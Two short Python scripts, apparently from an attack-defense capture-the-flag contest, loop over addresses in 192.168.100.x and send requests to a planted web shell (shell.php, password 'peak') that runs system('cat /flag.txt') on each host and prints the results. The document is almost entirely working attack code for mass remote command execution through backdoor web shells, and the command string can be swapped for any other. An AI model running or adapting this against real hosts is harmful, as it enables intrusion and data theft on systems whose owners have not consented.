python2 Guión
import urllib.request
import threading
def cat_flag():
cmd = "cat%20/flag.txt"
path = "shell.php"
passwd = "peak"
for i in range(110, 140):
ip = "192.168.100." + str(i)
print(ip)
system1= 'system("' + cmd + '");'
system2 = passwd + "=" + system1
url = "http://" + ip + "/" + path + "?" + system2
try:
response = urllib.request.urlopen(url)
html = response.read().decode('utf-8')
if "404" in html:
print(ip,"#############################################NO flag#######################################################")
else:
print(ip, html)
print("#################################################fflag在上面##################################################")
except:
pass
print("error")
t = threading.Thread(target=cat_flag)
t.start()
guión python3
import requests
import threading
def get_flag(ip,path,cmd,passwd):
system1= 'system("' + cmd + '");'
system2 = passwd + "=" + system1
url = "http://" + ip + "/" + path + "?" + system2
try:
r = requests.get(url)
if "404" in r.text:
print("--------------------------------------------------No flag------------------------------------------------------------")
print()
else:
print(url,r.text)
print(ip)
print("--------------------------------------------------上面是flag---------------------------------------------------------")
except:
pass
cmd = "cat /flag.txt"
path = "shell.php"
passwd = "peak"
for i in range(1,139):
ip = "192.168.100."+str(i)
t = threading.Thread(target=get_flag,args=(ip,path,cmd,passwd))
t.start()